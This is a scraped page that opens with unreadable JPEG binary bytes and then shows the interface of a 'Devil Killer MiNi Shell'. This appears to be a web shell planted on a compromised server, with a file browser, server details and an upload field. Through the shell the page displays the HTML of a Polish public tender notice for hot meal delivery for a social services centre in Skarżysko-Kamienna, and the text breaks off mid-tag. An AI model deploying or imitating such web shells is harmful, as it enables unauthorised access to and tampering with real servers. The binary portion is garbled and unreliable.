JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20251029/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20251029/0050241501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> ,,Przygotowywanie i wydawanie oraz dowóz gorących posiłków dla klientów Centrum Usług Społecznych w Skarżysku - Kamiennej od dnia 02.01.2026 r. do dnia 01.01.2027 r.&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">CENTRUM USŁUG SPOŁECZNYCH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 290507889</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Sikorskiego 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Skarżysko-Kamienna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">41 25 25 035</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@cus.skarkam.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.cus.skarkam.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ,,Przygotowywanie i wydawanie oraz dowóz gorących posiłków dla klientów Centrum Usług Społecznych w Skarżysku - Kamiennej od dnia 02.01.2026 r. do dnia 01.01.2027 r.&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8ccd8184-63d1-4e48-8cf9-1291a4c74b5d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00502415</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00049241/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Przygotowywanie i wydawanie oraz dowóz gorących posiłków dla klientów Centrum Usług Społecznych w Skarżysku-Kamiennej od dnia 02.01.2026 r. do dnia 01.01.2027 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-8ccd8184-63d1-4e48-8cf9-1291a4c74b5d <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między <br/> Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która <br/> jest dostępna pod adresem https://ezamowienia.gov.pl<br/>Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację <br/> Wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający <br/> dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: <br/> sekretariat@cus.skarkam.pl (nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Składanie ofert dostępne jest tylko dla użytkowników Platformy będących Wykonawcami, <br/> posiadającymi uprawnienie: Składanie ofert/wniosków/prac konkursowych. Maksymalny <br/> łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to 250 MB.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy <br/> do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako <br/> załączniki do jednego formularza).<br/>Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania <br/> z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia <br/> określa Regulamin korzystania z Platformy e-Zamówienia. Zaleca się stosowanie <br/> aktualnie wspieranych wersji oprogramowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku <br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. Urz. UE L 119 z 04.05.2016, str.1, z późn. zm.); zwanym dalej „RODO”, informujemy, że: <br/>1)	Administratorem Pani/Pana danych jest Dyrektor Centrum Usług Społecznych<br/>w Skarżysku-Kamiennej, ul. Sikorskiego 19. <br/>Kontakt e-mail: sekretariat@cus.skarkam.pl, tel. 41 25 25 035.<br/>Administrator danych osobowych wyznaczył inspektora ochrony danych osobowych. Kontakt e-mail: iodo@cus.skarkam.pl, tel. 41 25 29 111.<br/>2)	Pani/Pana dane osobowe przetwarzane będą:<br/>a)	na podstawie art. 6 ust. 1 lit. c i f RODO, przy czym za prawnie uzasadniony interes Zamawiającego wskazuje się konieczność przeprowadzenia Postępowania <br/>i wykonania umowy zawartej w wyniku udzielenia zamówienia będącego przedmiotem Postępowania nr PS.I.271.16.2025 w celu związanym z postępowaniem w ramach wyłonienia wykonawcy oraz udzielenia zamówienia publicznego poprzez zawarcie umowy w sprawie zamówienia objętego postępowaniem, <br/>b)	w celu wykonania umowy zawartej na skutek przeprowadzenia Postępowania<br/>i dochodzenia wszelkich roszczeń wynikających z przedmiotowej umowy; <br/>c)	w celu przechowywania dokumentacji Postępowania na wypadek kontroli prowadzonej przez uprawnione organy i podmioty, jak również w celu posługiwania się nią w celach postępowań sądowych lub/i administracyjnych lub/i karnych <br/>i innych związanych z niniejszym Postępowaniem i umową obejmującą jego wykonanie; <br/>d)	w celu archiwizacji dokumentacji Postępowania o udzielenie niniejszego zamówienia publicznego i dokumentacji związanej z wykonaniem umowy zawartej na skutek udzielenia niniejszego zamówienia publicznego, a następnie jej usunięcia <br/>i zniszczenia; <br/>e)	na podstawie art. 6 ust. 1 lit. b RODO, gdy przetwarzanie jest niezbędne<br/>do wykonania umowy, której jest Pan/Pani stroną, lub do podjęcia działań<br/>na Pani/Pana żądanie przed zawarciem umowy. <br/>3)	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja Postępowania w oparciu o art. 18 oraz<br/>art. 74 Ustawy Pzp. Pana/Pani dane osobowe będą ponadto udostępniane innym podmiotom, jeżeli przepisy szczególne tak stanowią. <br/>4)	Dane osobowe nie będą przekazywane do państwa trzeciego, ani organizacji międzynarodowej w rozumieniu RODO. <br/>5)	Pani/Pana dane osobowe będą przechowywane:<br/>a)	zgodnie z art. 78 pkt. 1 ustawy prawo zamówień publicznych, Zamawiający przechowuje protokół postępowania wraz z załącznikami przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, w sposób gwarantujący jego nienaruszalność, <br/>b)	zgodnie z art. 78 pkt. 4 ustawy prawo zamówień publicznych, jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego przekracza<br/>4 lata, zamawiający przechowuje protokół postępowania wrazz załącznikami przez cały okres obowiązywania umowy w sprawie zamówienia publicznego, <br/>c)	do czasu przeprowadzania archiwizacji dokumentacji - w zakresie określonym w przepisach archiwizacji. <br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego, <br/>7)	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO,</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PS.I.271.16.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usług w postaci przygotowania i podawania oraz dowozu gorącego posiłku z podziałem na dwa Zadania:<br/>Zadanie Nr 1 – przygotowanie i wydawanie posiłków dla klientów Centrum Usług Społecznych w Skarżysku - Kamiennej przez 5 dni w tygodniu od poniedziałku do piątku z wyłączeniem dni świątecznych oraz sobót i niedziel dla osób korzystających ze wsparcia Centrum Usług Społecznych w Skarżysku - Kamiennej od dnia 02.01.2026 roku <br/>do dnia 31.12.2026 roku w lokalu Wykonawcy, znajdującym się w granicach administracyjnych Gminy Skarżysko-Kamienna.<br/>Zadanie Nr 2 – przygotowanie i dostarczenie do miejsca zamieszkania gorących posiłków dla beneficjentów Centrum Usług Społecznych w Skarżysku - Kamiennej od dnia 02.01.2026 roku do dnia 01.01.2027 roku </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55520000-1 - Usługi dostarczania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55300000-3 - Usługi restauracyjne i dotyczące podawania posiłków</p> <p class="mb-0">55321000-6 - Usługi przygotowywania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-02 do 2027-01-01</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena oferty jest sumą uzyskanych punktów w kryterium cena, kryterium społeczne zatrudnieniowe i kryterium okres niepowtarzalności jadłospisu. Oferta spełniająca w najwyższym stopniu wymagania kryterium otrzyma najwyższą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Społeczne zatrudnieniowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres niepowtarzalności jadłospisu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału, określone w art. 112 ust. 2 ustawy Pzp, dotyczące: <br/>1.2.1) zdolności do występowania w obrocie gospodarczym: Zamawiający nie określa <br/> warunku w tym zakresie. <br/>1.2.2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej <br/> o ile wynika to z odrębnych przepisów: <br/>Wymagany jest aktualny wpis do właściwego rejestru na podstawie ustawy z dnia 25 sierpnia 2006 roku o bezpieczeństwie żywności i żywienia (Dz. U. 2023 r. poz. 1448), tj: wpis zakładu do rejestru zakładów podlegających urzędowej kontroli Państwowej Inspekcji Sanitarnej - na zasadzie SPEŁNIA/NIE SPEŁNIA.<br/>1.2.3) sytuacji ekonomicznej lub finansowej: Zamawiający nie określa warunku w tym <br/> zakresie.<br/>1.2.4) zdolności technicznej lub zawodowej: o udzielenie zamówienia mogą ubiegać <br/> się Wykonawcy, którzy wykażą, że w okresie ostatnich 3 lat przed upływem terminu <br/> składania ofert należycie wykonali usługi, które są przedmiotem niniejszego <br/> zamówienia o liczbie świadczeń nie mniejszej niż 5 000 rocznie na zasadzie SPEŁNIA/NIE SPEŁNIA. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Podmiotowe środki dowodowe potwierdzające spełnianie warunków udziału <br/> w postępowaniu lub kryteriów selekcji dotyczących zdolności technicznej lub <br/> zawodowej:<br/>2.4.1) w celu potwierdzenia spełnienia przez Wykonawcę warunków udziału w postępowaniu <br/> dotyczących zdolności technicznej lub zawodowej, Zamawiający żąda wykazu, wedle <br/> wzoru stanowiącego Załącznik Nr 7 do SWZ, usług wykonanych lub wykonywanych, <br/> które są przedmiotem niniejszego zamówienia w okresie ostatnich 3 lat przed upływem <br/> terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym <br/> okresie z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz <br/> których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów <br/> określających czy te dostawy lub usługi zostały wykonane lub są wykonywane <br/> należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty <br/> wystawione przez podmiot, na rzecz którego usługi były wykonywane <br/> lub są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze <br/> Wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; <br/> w przypadku świadczeń nadal wykonywanych referencje bądź inne dokumenty <br/> potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 <br/> miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie <br/> do udziału w postępowaniu. Jeżeli Wykonawca powołuje się na doświadczenie <br/> w realizacji, usług, wykonywanych wspólnie z innymi Wykonawcami, wykaz o którym <br/> mowa w pkt 2.4.1, dotyczy usług, w których wykonaniu Wykonawca <br/> ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających <br/> się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy. <br/> Okresy wyrażone w latach lub miesiącach, o których mowa w pkt 2.4.1, liczy <br/> się wstecz od dnia, w którym upływa termin składania ofert.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, Zamawiający żąda następujących podmiotowych środków dowodowych: <br/>2.2.1) zaświadczenia właściwego naczelnika Urzędu Skarbowego potwierdzającego, <br/> że Wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109, ust. 1, <br/> pkt 1 Ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, <br/> a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem <br/> Zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed <br/> upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu <br/> albo przed upływem terminu składania ofert Wykonawca dokonał płatności <br/> należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące <br/> porozumienie w sprawie spłat tych należności; <br/>2.2.2) zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej <br/> Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub <br/> właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego <br/> potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia <br/> społeczne i zdrowotne w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego <br/> nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania <br/> z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz <br/> z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia dokumentów <br/> potwierdzających, że odpowiednio przed upływem terminu składania wniosków <br/> o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania <br/> ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne <br/> lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie <br/> w sprawie spłat tych należności; <br/>2.2.3) odpisu lub informacji z Krajowego Rejestru Sądowego lub Centralnej Ewidencji <br/> i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust.1 pkt 4 ustawy Pzp, <br/> sporządzony nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy <br/> wymagają wpisu do rejestru lub ewidencji;<br/>2.2.4) wpis do rejestru Zakładów Żywieniowo-Żywnościowych właściwego terytorialnie <br/> Państwowego Powiatowego Inspektora Sanitarnego;<br/>2.2.5) oświadczenia Wykonawcy (wedle wzoru stanowiącego Załącznik Nr 6 do SWZ) - <br/> o aktualności informacji zawartych w oświadczeniach stanowiących Załącznik Nr 3 <br/> oraz 11, w zakresie podstaw wykluczenia z postępowania wskazanych przez <br/> Zamawiającego, o których mowa w rozdz. V pkt 1 ppkt 1.1.2 SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz oferty - zawiera Załącznik Nr 1 do SWZ; <br/>2. Formularz cenowy – zawiera Załącznik Nr 2 do SWZ;<br/>3. Oświadczenie Wykonawcy o niepodleganiu wykluczeniu, spełnieniu warunków udziału <br/> w postępowaniu SWZ – Załącznik Nr 3 do SWZ;<br/>4. Zobowiązania innych podmiotów do udostępnienia zasobów, o ile Wykonawca polega <br/> na takich zasobach w celu wykazania spełnienia warunków – Załącznik Nr 4 do SWZ, <br/> jeśli dotyczy; <br/>5. Oświadczenie, dotyczy Wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/> – Załącznik Nr 5 do SWZ, jeśli dotyczy; <br/>6. Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik, <br/> jeśli dotyczy; <br/>7. Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców <br/> wspólnie ubiegających się o udzielenie zamówienia – dotyczy ofert składanych przez <br/> Wykonawców wspólnie ubiegających się o udzielenie zamówienia, jeśli dotyczy,<br/>8. Oświadczenie Wykonawcy ubiegającego się o udzielenie zamówienia uwzględniające <br/> przesłanki wykluczenia z art. 7, ust. 1 ustawy o szczególnych rozwiązaniach w zakresie <br/> przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa <br/> narodowego – Załącznik Nr 10. <h2 class="bg-light p-3 